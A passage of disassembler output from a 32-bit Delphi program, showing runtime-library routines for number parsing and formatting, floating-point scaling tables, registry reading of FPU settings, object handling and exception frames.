test esi, esi
jge short loc_4000375F
mov [esp+ebx+24h+var_24], 2Dh
inc ebx
loc_4000375F: ; CODE XREF: sub_40003730+28�j
mov [edi], bl
inc edi
mov ecx, [esp+24h+var_10]
cmp ecx, 0FFh
jle short loc_40003773
mov ecx, 0FFh
loc_40003773: ; CODE XREF: sub_40003730+3C�j
sub ecx, ebx
jle short loc_4000377E
add [edi-1], cl
mov al, 20h
rep stosb
loc_4000377E: ; CODE XREF: sub_40003730+45�j
; sub_40003730+56�j
mov al, [esp+ebx-1]
mov [edi], al
inc edi
dec ebx
jnz short loc_4000377E
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_40003730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003790 proc near ; CODE XREF: sub_40016CE8+2A�p
mov ecx, edx
xor edx, edx
call sub_40003730
retn
sub_40003790 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000379C proc near ; CODE XREF: sub_40007DD4+6�p
; sub_40007DEC+B�p ...
push ebx
push esi
push edi
mov esi, eax
push eax
test eax, eax
jz short loc_40003812
xor eax, eax
xor ebx, ebx
mov edi, 0CCCCCCCh
loc_400037AF: ; CODE XREF: sub_4000379C+19�j
mov bl, [esi]
inc esi
cmp bl, 20h
jz short loc_400037AF
mov ch, 0
cmp bl, 2Dh
jz short loc_40003820
cmp bl, 2Bh
jz short loc_40003822
loc_400037C3: ; CODE XREF: sub_4000379C+89�j
cmp bl, 24h
jz short loc_40003827
cmp bl, 78h
jz short loc_40003827
cmp bl, 58h
jz short loc_40003827
cmp bl, 30h
jnz short loc_400037EA
mov bl, [esi]
inc esi
cmp bl, 78h
jz short loc_40003827
cmp bl, 58h
jz short loc_40003827
test bl, bl
jz short loc_40003808
jmp short loc_400037EE
; ---------------------------------------------------------------------------
loc_400037EA: ; CODE XREF: sub_4000379C+39�j
test bl, bl
jz short loc_4000381B
loc_400037EE: ; CODE XREF: sub_4000379C+4C�j
; sub_4000379C+6A�j
sub bl, 30h
cmp bl, 9
ja short loc_4000381B
cmp eax, edi
ja short loc_4000381B
lea eax, [eax+eax*4]
add eax, eax
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_400037EE
loc_40003808: ; CODE XREF: sub_4000379C+4A�j
dec ch
jz short loc_40003815
test eax, eax
jge short loc_40003864
jmp short loc_4000381B
; ---------------------------------------------------------------------------
loc_40003812: ; CODE XREF: sub_4000379C+8�j
; sub_4000379C+95�j
inc esi
jmp short loc_4000381B
; ---------------------------------------------------------------------------
loc_40003815: ; CODE XREF: sub_4000379C+6E�j
neg eax
jle short loc_40003864
js short loc_40003864
loc_4000381B: ; CODE XREF: sub_4000379C+50�j
; sub_4000379C+58�j ...
pop ebx
sub esi, ebx
jmp short loc_40003867
; ---------------------------------------------------------------------------
loc_40003820: ; CODE XREF: sub_4000379C+20�j
inc ch
loc_40003822: ; CODE XREF: sub_4000379C+25�j
mov bl, [esi]
inc esi
jmp short loc_400037C3
; ---------------------------------------------------------------------------
loc_40003827: ; CODE XREF: sub_4000379C+2A�j
; sub_4000379C+2F�j ...
mov edi, 0FFFFFFFh
mov bl, [esi]
inc esi
test bl, bl
jz short loc_40003812
loc_40003833: ; CODE XREF: sub_4000379C+C0�j
cmp bl, 61h
jb short loc_4000383B
sub bl, 20h
loc_4000383B: ; CODE XREF: sub_4000379C+9A�j
sub bl, 30h
cmp bl, 9
jbe short loc_4000384E
sub bl, 11h
cmp bl, 5
ja short loc_4000381B
add bl, 0Ah
loc_4000384E: ; CODE XREF: sub_4000379C+A5�j
cmp eax, edi
ja short loc_4000381B
shl eax, 4
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_40003833
dec ch
jnz short loc_40003864
neg eax
loc_40003864: ; CODE XREF: sub_4000379C+72�j
; sub_4000379C+7B�j ...
pop ecx
xor esi, esi
loc_40003867: ; CODE XREF: sub_4000379C+82�j
mov [edx], esi
pop edi
pop esi
pop ebx
retn
sub_4000379C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40003870 proc near ; CODE XREF: sub_40008B01+58�p
; sub_40008D00+85�p
jmp sub_40003878
sub_40003870 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003878 proc near ; CODE XREF: sub_40003870�j
push ebx
xor ebx, ebx
test eax, eax
jl short loc_400038CC
jz loc_4000391F
cmp eax, 1400h
jge loc_40003911
mov edx, eax
and edx, 1Fh
lea edx, [edx+edx*4]
fld ds:tbyte_4000392B[ebx+edx*2]
fmulp st(1), st
shr eax, 5
jz short loc_4000391F
mov edx, eax
and edx, 0Fh
jz short loc_400038B9
lea edx, [edx+edx*4]
fld tbyte ptr ds:byte_40003A61[ebx+edx*2]
fmulp st(1), st
loc_400038B9: ; CODE XREF: sub_40003878+33�j
shr eax, 4
jz short loc_4000391F
lea eax, [eax+eax*4]
fld ds:tbyte_40003AF7[ebx+eax*2]
fmulp st(1), st
jmp short loc_4000391F
; ---------------------------------------------------------------------------
loc_400038CC: ; CODE XREF: sub_40003878+5�j
neg eax
cmp eax, 1400h
jge short loc_4000391B
mov edx, eax
and edx, 1Fh
lea edx, [edx+edx*4]
fld ds:tbyte_4000392B[ebx+edx*2]
fdivp st(1), st
shr eax, 5
jz short loc_4000391F
mov edx, eax
and edx, 0Fh
jz short loc_400038FE
lea edx, [edx+edx*4]
fld tbyte ptr ds:byte_40003A61[ebx+edx*2]
fdivp st(1), st
loc_400038FE: ; CODE XREF: sub_40003878+78�j
shr eax, 4
jz short loc_4000391F
lea eax, [eax+eax*4]
fld ds:tbyte_40003AF7[ebx+eax*2]
fdivp st(1), st
jmp short loc_4000391F
; ---------------------------------------------------------------------------
loc_40003911: ; CODE XREF: sub_40003878+12�j
fstp st
fld ds:tbyte_40003921[ebx]
jmp short loc_4000391F
; ---------------------------------------------------------------------------
loc_4000391B: ; CODE XREF: sub_40003878+5B�j
fstp st
fldz
loc_4000391F: ; CODE XREF: sub_40003878+7�j
; sub_40003878+2C�j ...
pop ebx
retn
sub_40003878 endp
; ---------------------------------------------------------------------------
tbyte_40003921 dt 1.1897314953572317651e4932 ; DATA XREF: sub_40003878+9B�r
tbyte_4000392B dt 1.0 ; DATA XREF: sub_40003878+20�r
; sub_40003878+65�r
align 4
dd 0
dd 4002A0h, 0
dd 5C80000h, 40h, 0
dd 4008FAh, 0
dd 0C9C4000h, 40h, 50000000h, 400FC3h, 0
dd 12F42400h, 40h, 96800000h, 401698h, 0
dd 19BEBC20h, 40h, 6B280000h, 401CEEh, 0
dd 209502F9h, 40h, 43B74000h, 4023BAh, 10000000h, 26E8D4A5h
dd 40h, 84E72A00h, 402A91h, 0F4800000h, 2DB5E620h, 40h
dd 5FA931A0h, 4030E3h, 0BF040000h, 348E1BC9h, 40h, 0A2BC2EC5h
dd 4037B1h, 3A764000h, 3ADE0B6Bh, 0E8000040h, 0C7230489h
dd 403E8Ah, 0C5AC6200h, 41AD78EBh, 7A800040h, 0D726B717h
dd 4044D8h, 326EAC90h, 48878678h, 57B40040h, 68163F0Ah
dd 404BA9h, 0CECCEDA1h, 4ED3C21Bh, 1484A040h, 59516140h
dd 0C8405284h, 0B99019A5h, 55A56FA5h, 200F3A40h, 0CB8F27F4h
dd 844058CEh, 78F89409h, 5C813F39h, 0B90BE540h, 8F07D736h
dd 0DF405FA1h, 0CD04674Eh, 62C9F2C9h
db 40h
byte_40003A61 db 96h ; DATA XREF: sub_40003878+38�r
; sub_40003878+7D�r
dw 8122h
dd 6F7C4045h, 9E4065FCh, 0A82B70B5h, 699DC5ADh, 0CFA6D540h
dd 781F49FFh, 0A340D3C2h, 16C59B14h, 3DEFB3ABh, 0E98CE041h
dd 0BA47C980h, 0AA41A893h, 2B7FE617h, 12B616A1h, 27556B42h
dd 70F78D39h, 30427CE0h, 0FFE33CC9h, 0E78A5296h, 0F9DE8E42h
dd 7EEBFB9Dh, 8C4351AAh, 195C6A2Fh, 0BBD226FCh, 0CCE37643h
dd 842F29F2h, 0D2442681h, 0DB900Ah, 909FA427h, 0F8AA1744h
dd 0C5E310AEh, 5944FAC4h, 7E9B09Ch, 64F28A9Ch, 0F7F3D445h
dd 7A4AE1EBh
db 95h, 0CFh, 45h
tbyte_40003AF7 dt 9.9999999999999999996e479 ; DATA XREF: sub_40003878+49�r
; sub_40003878+8E�r
db 0C7h, 91h, 0Eh
dd 19A0AEA6h, 1746A3E3h, 8681750Ch, 48C97675h, 93A7E44Dh
dd 0B8353B39h, 0E553EDB2h, 5DC53D5Dh, 929E8B3Bh, 0A1F0A65Ah
dd 0A554C020h, 8B61378Ch, 25D88B5Ah, 0DBF9895Dh, 27F3F867h
dd 5DC8A2BFh, 9B6E80DDh, 28A2097h, 25C46052h, 0D559F075h
dd 3511626Eh, 0C37BCAAEh
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40003B5C proc near ; CODE XREF: sub_40003B64+5�p
; sub_40003B64+11�p
jmp ds:dword_400243FC
sub_40003B5C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003B64 proc near ; CODE XREF: .itext:4001903E�p
push ebx
xor ebx, ebx
push 0
call sub_40003B5C ; GetKeyboardType
cmp eax, 7
jnz short loc_40003B8F
push 1
call sub_40003B5C ; GetKeyboardType
and eax, 0FF00h
cmp eax, 0D00h
jz short loc_40003B8D
cmp eax, 400h
jnz short loc_40003B8F
loc_40003B8D: ; CODE XREF: sub_40003B64+20�j
mov bl, 1
loc_40003B8F: ; CODE XREF: sub_40003B64+D�j
; sub_40003B64+27�j
mov eax, ebx
pop ebx
retn
sub_40003B64 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40003B94 proc near ; CODE XREF: .itext:40019047�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
movzx eax, word_4001A024
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push 1
push 0
push offset aSoftwareBorlan ; "SOFTWARE\\Borland\\Delphi\\RTL"
push 80000002h
call sub_40001240 ; RegOpenKeyExA
test eax, eax
jnz short loc_40003C0C
xor eax, eax
push ebp
push offset loc_40003C05
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_C], 4
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0
push offset aFpumaskvalue ; "FPUMaskValue"
mov eax, [ebp+var_4]
push eax
call sub_40001248 ; RegQueryValueExA
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40003C0C
loc_40003BFB: ; CODE XREF: sub_40003B94+76�j
mov eax, [ebp+var_4]
push eax
call sub_40001238 ; RegCloseKey
retn
; ---------------------------------------------------------------------------
loc_40003C05: ; DATA XREF: sub_40003B94+2E�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40003BFB
; ---------------------------------------------------------------------------
loc_40003C0C: ; CODE XREF: sub_40003B94+29�j
; DATA XREF: sub_40003B94+62�o
movzx eax, word_4001A024
and ax, 0FFC0h
movzx edx, word ptr [ebp+var_8]
and dx, 3Fh
or ax, dx
mov word_4001A024, ax
mov esp, ebp
pop ebp
retn
sub_40003B94 endp
; ---------------------------------------------------------------------------
aSoftwareBorlan db 'SOFTWARE\Borland\Delphi\RTL',0 ; DATA XREF: sub_40003B94+18�o
aFpumaskvalue db 'FPUMaskValue',0 ; DATA XREF: sub_40003B94+4C�o
align 4
; =============== S U B R O U T I N E =======================================
sub_40003C58 proc near ; CODE XREF: sub_400040D8+20�p
; .text:4000445E�p ...
fninit
wait
fldcw word_4001A024
retn
sub_40003C58 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40003C64 proc near ; CODE XREF: sub_4000ED90+E2�p
; sub_4000ED90+103�p ...
mov al, 4
jmp sub_40002D50
sub_40003C64 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40003C6C proc near ; CODE XREF: sub_40002540+28F�p
; sub_4000ADE0+FF�p ...
push esi
push edi
mov edi, edx
mov esi, [eax-2Ch]
xor ecx, ecx
mov cl, [esi]
inc ecx
rep movsb
pop edi
pop esi
retn
sub_40003C6C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003C80 proc near ; CODE XREF: sub_40006264�p
; DATA XREF: .text:4000105C�o ...
push ebx
mov ebx, eax
mov eax, ebx
call sub_40003CB0
call sub_40002C20
mov edx, eax
mov eax, ebx
call sub_40003CF4
pop ebx
retn
sub_40003C80 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003C9C proc near ; CODE XREF: sub_4000B204+6�p
; DATA XREF: .text:40001060�o ...
push ebx
mov ebx, eax
mov eax, ebx
call sub_40003D4C
mov eax, ebx
call sub_40002C3C
pop ebx
retn
sub_40003C9C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003CB0 proc near ; CODE XREF: sub_40003C80+5�p
add eax, 0FFFFFFD8h
mov eax, [eax]
retn
sub_40003CB0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003CB8 proc near ; CODE XREF: sub_4000C69C+16�p
; sub_4000C69C+50�p ...
test dl, dl
jz short loc_40003CC4
add esp, 0FFFFFFF0h
call sub_40003F30
loc_40003CC4: ; CODE XREF: sub_40003CB8+2�j
test dl, dl
jz short locret_40003CD7
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
locret_40003CD7: ; CODE XREF: sub_40003CB8+E�j
retn
sub_40003CB8 endp
; =============== S U B R O U T I N E =======================================
sub_40003CD8 proc near ; CODE XREF: sub_4000C55C+3D�p
; sub_4000C710+19�p ...
call sub_40003FD8
test dl, dl
jle short locret_40003CE6
call sub_40003F80
locret_40003CE6: ; CODE XREF: sub_40003CD8+7�j
retn
sub_40003CD8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003CE8 proc near ; CODE XREF: sub_400040D8+11F�j
; .text:4000429F�j ...
test eax, eax
jz short locret_40003CF3
mov dl, 1
mov ecx, [eax]
call dword ptr [ecx-4]
locret_40003CF3: ; CODE XREF: sub_40003CE8+2�j
retn
sub_40003CE8 endp
; =============== S U B R O U T I N E =======================================
sub_40003CF4 proc near ; CODE XREF: sub_40003C80+13�p
push ebx
push esi
push edi
mov ebx, eax
mov edi, edx
stosd
mov ecx, [ebx-28h]
xor eax, eax
push ecx
shr ecx, 2
dec ecx
rep stosd
pop ecx
and ecx, 3
rep stosb
mov eax, edx
mov edx, esp
loc_40003D12: ; CODE XREF: sub_40003CF4+2F�j
mov ecx, [ebx-48h]
test ecx, ecx
jz short loc_40003D1A
push ecx
loc_40003D1A: ; CODE XREF: sub_40003CF4+23�j
mov ebx, [ebx-24h]
test ebx, ebx
jz short loc_40003D25
mov ebx, [ebx]
jmp short loc_40003D12
; ---------------------------------------------------------------------------
loc_40003D25: ; CODE XREF: sub_40003CF4+2B�j
cmp esp, edx
jz short loc_40003D46
loc_40003D29: ; CODE XREF: sub_40003CF4+50�j
pop ebx
mov ecx, [ebx]
add ebx, 4
loc_40003D2F: ; CODE XREF: sub_40003CF4+4C�j
mov esi, [ebx+10h]
test esi, esi
jz short loc_40003D3C
mov edi, [ebx+14h]
mov [edi+eax], esi
loc_40003D3C: ; CODE XREF: sub_40003CF4+40�j
add ebx, 1Ch
dec ecx
jnz short loc_40003D2F
cmp esp, edx
jnz short loc_40003D29
loc_40003D46: ; CODE XREF: sub_40003CF4+33�j
pop edi
pop esi
pop ebx
retn
sub_40003CF4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003D4C proc near ; CODE XREF: sub_40003C9C+5�p
push ebx
push esi
mov ebx, eax
mov esi, eax
loc_40003D52: ; CODE XREF: sub_40003D4C+1B�j
mov esi, [esi]
mov edx, [esi-40h]
mov esi, [esi-24h]
test edx, edx
jz short loc_40003D65
call sub_400052C8
mov eax, ebx
loc_40003D65: ; CODE XREF: sub_40003D4C+10�j
test esi, esi
jnz short loc_40003D52
pop esi
pop ebx
retn
sub_40003D4C endp
; =============== S U B R O U T I N E =======================================
sub_40003D6C proc near ; CODE XREF: sub_40003D9C+59�p
xchg edx, ecx
cmp ecx, 0FF000000h
jnb short loc_40003D87
cmp ecx, 0FE000000h
jb short loc_40003D85
movsx ecx, cx
add ecx, [eax]
jmp dword ptr [ecx]
; ---------------------------------------------------------------------------
loc_40003D85: ; CODE XREF: sub_40003D6C+10�j
jmp ecx
; ---------------------------------------------------------------------------
loc_40003D87: ; CODE XREF: sub_40003D6C+8�j
and ecx, 0FFFFFFh
add ecx, eax
mov eax, edx
mov edx, [ecx]
jmp sub_4000621C
sub_40003D6C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40003D9C proc near ; CODE XREF: .text:40006283�p
; sub_400123C8+A0�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_8], ebx
mov esi, ecx
mov [ebp+var_4], edx
mov edi, eax
xor eax, eax
push ebp
push offset loc_40003E20
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
mov [esi], eax
mov edx, [ebp+var_4]
mov eax, [edi]
call sub_40003E30
mov ebx, eax
test ebx, ebx
jz short loc_40003E04
mov eax, [ebx+14h]
test eax, eax
jz short loc_40003DED
add edi, eax
mov [esi], edi
cmp dword ptr [esi], 0
jz short loc_40003E04
mov eax, [esi]
push eax
mov eax, [eax]
call dword ptr [eax+4]
jmp short loc_40003E04
; ---------------------------------------------------------------------------
loc_40003DED: ; CODE XREF: sub_40003D9C+3C�j
lea ecx, [ebp+var_8]
mov edx, [ebx+18h]
mov eax, edi
call sub_40003D6C
mov edx, [ebp+var_8]
mov eax, esi
call sub_4000621C
loc_40003E04: ; CODE XREF: sub_40003D9C+35�j
; sub_40003D9C+45�j ...
cmp dword ptr [esi], 0
setnz bl
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40003E27
loc_40003E17: ; CODE XREF: sub_40003D9C+89�j
lea eax, [ebp+var_8]
call sub_40006204
retn
; ---------------------------------------------------------------------------
loc_40003E20: ; DATA XREF: sub_40003D9C+18�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40003E17
; ---------------------------------------------------------------------------
loc_40003E27: ; CODE XREF: sub_40003D9C+83�j
; DATA XREF: sub_40003D9C+76�o
mov eax, ebx
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_40003D9C endp
; =============== S U B R O U T I N E =======================================
sub_40003E30 proc near ; CODE XREF: sub_40003D9C+2C�p
push ebx
push esi
mov ebx, eax
loc_40003E34: ; CODE XREF: sub_40003E30+3D�j
mov eax, [ebx-48h]
test eax, eax
jz short loc_40003E64
mov ecx, [eax]
add eax, 4
loc_40003E40: ; CODE XREF: sub_40003E30+32�j
mov esi, [edx]
cmp esi, [eax]
jnz short loc_40003E5E
mov esi, [edx+4]
cmp esi, [eax+4]
jnz short loc_40003E5E
mov esi, [edx+8]
cmp esi, [eax+8]
jnz short loc_40003E5E
mov esi, [edx+0Ch]
cmp esi, [eax+0Ch]
jz short loc_40003E71
loc_40003E5E: ; CODE XREF: sub_40003E30+14�j
; sub_40003E30+1C�j ...
add eax, 1Ch
dec ecx
jnz short loc_40003E40
loc_40003E64: ; CODE XREF: sub_40003E30+9�j
mov ebx, [ebx-24h]
test ebx, ebx
jz short loc_40003E6F
mov ebx, [ebx]
jmp short loc_40003E34
; ---------------------------------------------------------------------------
loc_40003E6F: ; CODE XREF: sub_40003E30+39�j
xor eax, eax
loc_40003E71: ; CODE XREF: sub_40003E30+2C�j
pop esi
pop ebx
retn
sub_40003E30 endp
; =============== S U B R O U T I N E =======================================
sub_40003E74 proc near ; CODE XREF: sub_4000ADE0+A8�p
; sub_4000B654+94�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
test ebx, ebx
jz short loc_40003E8B
mov edx, esi
mov eax, [ebx]
call sub_40003EE0
test al, al
jnz short loc_40003E90
loc_40003E8B: ; CODE XREF: sub_40003E74+8�j
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40003E90: ; CODE XREF: sub_40003E74+15�j
mov al, 1
pop esi
pop ebx
retn
sub_40003E74 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003E98 proc near ; CODE XREF: sub_40003EC8+4�p
; sub_40003F08+13�p
push edi
xchg eax, esi
jmp short loc_40003E9E
; ---------------------------------------------------------------------------
loc_40003E9C: ; CODE XREF: sub_40003E98+1F�j
mov esi, [esi]
loc_40003E9E: ; CODE XREF: sub_40003E98+2�j
mov edi, [esi-30h]
test edi, edi
jz short loc_40003EB2
movzx ecx, word ptr [edi]
push ecx
add edi, 2
repne scasw
jz short loc_40003EBB
pop ecx
loc_40003EB2: ; CODE XREF: sub_40003E98+B�j
mov esi, [esi-24h]
test esi, esi
jnz short loc_40003E9C
pop edi
retn
; ---------------------------------------------------------------------------
loc_40003EBB: ; CODE XREF: sub_40003E98+17�j
pop eax
add eax, eax
sub eax, ecx
mov esi, [edi+eax*2-4]
pop edi
retn
sub_40003E98 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003EC8 proc near ; CODE XREF: sub_40013C30+43�p
; sub_40013C30+52�p ...
push eax
push ecx
mov eax, [eax]
call sub_40003E98
pop ecx
pop eax
jz short loc_40003ED7
jmp esi
; ---------------------------------------------------------------------------
loc_40003ED7: ; CODE XREF: sub_40003EC8+B�j
pop ecx
jmp sub_400030B4
sub_40003EC8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003EE0 proc near ; CODE XREF: sub_40003E74+E�p
jmp short loc_40003EE4
; ---------------------------------------------------------------------------
loc_40003EE2: ; CODE XREF: sub_40003EE0+D�j
mov eax, [eax]
loc_40003EE4: ; CODE XREF: sub_40003EE0�j
cmp eax, edx
jz short loc_40003EF0
mov eax, [eax-24h]
test eax, eax
jnz short loc_40003EE2
retn
; ---------------------------------------------------------------------------
loc_40003EF0: ; CODE XREF: sub_40003EE0+6�j
mov al, 1
retn
sub_40003EE0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003EF4 proc near ; DATA XREF: .text:40001048�o
; .text:4000110C�o ...
mov eax, 8000FFFFh
retn
sub_40003EF4 endp
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_40003F08 proc near ; DATA XREF: .text:40001054�o
; .text:40001118�o ...
push esi
mov si, [edx]
or si, si
jz short loc_40003F28
cmp si, 0C000h
jnb short loc_40003F28
push eax
mov eax, [eax]
call sub_40003E98
pop eax
jz short loc_40003F28
mov ecx, esi
pop esi
jmp ecx
; ---------------------------------------------------------------------------
loc_40003F28: ; CODE XREF: sub_40003F08+7�j
; sub_40003F08+E�j ...
pop esi
mov ecx, [eax]
jmp dword ptr [ecx-10h]
sub_40003F08 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003F30 proc near ; CODE XREF: sub_40003CB8+7�p
; sub_4000B030+A�p ...
arg_0 = byte ptr 4
push edx
push ecx
push ebx
test dl, dl
jl short loc_40003F3A
call dword ptr [eax-0Ch]
loc_40003F3A: ; CODE XREF: sub_40003F30+5�j
xor edx, edx
lea ecx, [esp+0Ch+arg_0]
mov ebx, fs:[edx]
mov [ecx], ebx
mov [ecx+8], ebp
mov dword ptr [ecx+4], offset sub_40003F59
mov [ecx+0Ch], eax
mov fs:[edx], ecx
pop ebx
pop ecx
pop edx
retn
sub_40003F30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40003F59 proc near ; DATA XREF: sub_40003F30+18�o
jmp sub_400040D8
sub_40003F59 endp
; ---------------------------------------------------------------------------
mov eax, [esp+2Ch]
mov eax, [eax+0Ch]
test eax, eax
jz short loc_40003F77
mov ecx, [eax]
mov dl, 81h
push eax
call dword ptr [ecx-4]
pop eax
call sub_40003F80
loc_40003F77: ; CODE XREF: .text:40003F67�j
call sub_4000430C
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003F80 proc near ; CODE XREF: sub_40003CD8+9�p
; .text:40003F72�p ...
mov edx, [eax]
call dword ptr [edx-8]
retn
sub_40003F80 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40003F88 proc near ; CODE XREF: sub_40003CB8+10�p
; sub_4000B030+25�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], eax
xor edx, edx
push ebp
push offset loc_40003FB7
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
mov edx, [eax]
call dword ptr [edx-1Ch]
mov eax, [ebp+var_4]
pop large dword ptr fs:0
add esp, 8
jmp short loc_40003FD0
; ---------------------------------------------------------------------------
loc_40003FB7: ; DATA XREF: sub_40003F88+D�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
mov dl, 1
mov eax, [ebp+var_4]
call sub_40003FD8
call sub_4000430C
call sub_40004360
loc_40003FD0: ; CODE XREF: sub_40003F88+2D�j
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_40003F88 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003FD8 proc near ; CODE XREF: sub_40003CD8�p
; sub_40003F88+39�p ...
test dl, dl
jg short loc_40003FDD
retn
; ---------------------------------------------------------------------------
loc_40003FDD: ; CODE XREF: sub_40003FD8+2�j
push eax
push edx
mov edx, [eax]
call dword ptr [edx-18h]
pop edx
pop eax
retn
sub_40003FD8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003FE8 proc near ; CODE XREF: sub_4000430C+35�p
cmp byte_4001A028, 1
jbe short locret_40004002
push 0
push 0
push 0
push 0EEDFADFh
call ds:off_4001C014
locret_40004002: ; CODE XREF: sub_40003FE8+7�j
retn
sub_40003FE8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004004 proc near ; CODE XREF: sub_400040D8+4D�p
cmp byte_4001A028, 0
jz short locret_40004024
push eax
push eax
push edx
push esp
push 2
push 0
push 0EEDFAE4h
call ds:off_4001C014
add esp, 8
pop eax
locret_40004024: ; CODE XREF: sub_40004004+7�j
retn
sub_40004004 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_40004040
loc_40004028: ; CODE XREF: sub_40004040+B�j
push esp
push 1
push 0
push 0EEDFAE0h
call ds:off_4001C014
add esp, 4
pop eax
retn
; END OF FUNCTION CHUNK FOR sub_40004040
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40004040 proc near ; CODE XREF: sub_400040D8+FD�p
; FUNCTION CHUNK AT 40004028 SIZE 00000015 BYTES
cmp byte_4001A028, 1
jbe short locret_40004050
push eax
push ebx
jmp loc_40004028
; ---------------------------------------------------------------------------
locret_40004050: ; CODE XREF: sub_40004040+7�j
retn
sub_40004040 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004054 proc near ; CODE XREF: sub_40004074+C�p
test ecx, ecx
jz short locret_40004071
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_4000406C
cmp byte ptr [ecx], 0EBh
jnz short locret_40004071
movsx eax, al
inc ecx
inc ecx
jmp short loc_4000406F
; ---------------------------------------------------------------------------
loc_4000406C: ; CODE XREF: sub_40004054+A�j
add ecx, 5
loc_4000406F: ; CODE XREF: sub_40004054+16�j
add ecx, eax
locret_40004071: ; CODE XREF: sub_40004054+2�j
; sub_40004054+F�j
retn
sub_40004054 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40004074 proc near ; CODE XREF: sub_40016280-12027�p
; sub_400042AC+25�p
cmp byte_4001A028, 1
jbe short locret_4000409A
push eax
push edx
push ecx
call sub_40004054
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call ds:off_4001C014
pop ecx
pop ecx
pop edx
pop eax
locret_4000409A: ; CODE XREF: sub_40004074+7�j
retn
sub_40004074 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000409C proc near ; CODE XREF: sub_40004360+28�p
cmp byte_4001A028, 1
jbe short locret_400040B7
push edx
push esp
push 1
push 0
push 0EEDFAE2h
call ds:off_4001C014
pop edx
locret_400040B7: ; CODE XREF: sub_4000409C+7�j
